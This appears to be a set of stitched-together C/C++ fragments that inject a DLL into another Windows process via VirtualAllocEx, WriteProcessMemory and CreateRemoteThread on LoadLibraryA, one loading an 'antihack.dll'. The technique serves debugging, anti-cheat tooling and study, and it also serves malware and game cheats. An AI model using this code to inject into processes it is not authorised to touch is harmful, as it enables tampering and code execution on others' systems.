printf(" [INFO] trying to create a remote thread at %08x\n",(unsigned long )addrLoadLibrary);
char *dllOutput = (char *)malloc(MAX_PATH);
memset(dllOutput,0,MAX_PATH);
ReadProcessMemory(hProcess,(LPCVOID )remoteMemory,dllOutput,MAX_PATH,&bR);
printf(" [INFO] confirming process has cave with \"%s\"\n",dllOutput);
free(dllOutput);
if(globalWait)
{
printf(" [WAIT] press any key to create remote thread...\n");
getc(stdin);
}
HANDLE threadId = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE )addrLoadLibrary,remoteMemory,NULL,NULL);
if (threadId == NULL)
{
printf(" [INFO] could not create remote thread\n");
return;
}
else
{
WaitForSingleObject(threadId, INFINITE); //this waits untill thread thread has finished
// VirtualFree(remoteMemory, 0, MEM_RELEASE); //free myFunc memory
CloseHandle(threadId);
CloseHandle(hProcess);
}
printf(" [INFO] success!\n");
if (globalPid != 0)
{
printf("\n\n - to connect to this process, use peek %d - \n\n", globalPid);
}
return;
}
void InjectAntihack(HANDLE hProc)
{
if (!hProc) throw std::exception("Invalid process handle");
HMODULE hModule = GetModuleHandleA("kernel32.dll");
if (!hModule) throw std::exception("Could not acquire module of kernel32.dll");
FARPROC pLoadLibrary = GetProcAddress(hModule, "LoadLibraryA");
if (!pLoadLibrary) throw std::exception("Could not acquire address of LoadLibraryA");
const std::string dllName = "antihack.dll";
int size = dllName.length()+1;
void* pRemoteAddress = VirtualAllocEx(hProc, 0, size, MEM_COMMIT, PAGE_READWRITE);
if (!pRemoteAddress) throw std::exception("Could not allocate remote memory");
if ( !WriteProcessMemory(hProc, pRemoteAddress, (void*)dllName.c_str(), size, 0) )
throw std::exception("Could not write remote string");
HANDLE hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteAddress, 0, 0);
if (!hThread) throw std::exception("Could not start remote thread");
WaitForSingleObject(hThread, INFINITE);
DWORD dwExit = 0;
GetExitCodeThread(hThread, &dwExit);
if (!dwExit) throw std::exception("Error while loading remote dll");
if ( !VirtualFreeEx(hProc, pRemoteAddress, size, MEM_DECOMMIT) )
throw std::exception("Could not free remote memory");
}
BOOL Inject(DWORD pID, const char * DLL_NAME)
{
HANDLE Proc;
HMODULE hLib;
char buf[50] = {0};
LPVOID RemoteString, LoadLibAddy;
if(!pID)
return false;
Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);
if(!Proc)
{
sprintf(buf, "OpenProcess() failed: %d", GetLastError());
//MessageBox(NULL, buf, "Loader", MB_OK);
printf(buf);
return false;
}
LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// Allocate space in the process for our DLL
RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
// Write the string name of our DLL in the memory allocated
WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME, strlen(DLL_NAME), NULL);
// Load our DLL
CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL);
CloseHandle(Proc);
return true;
}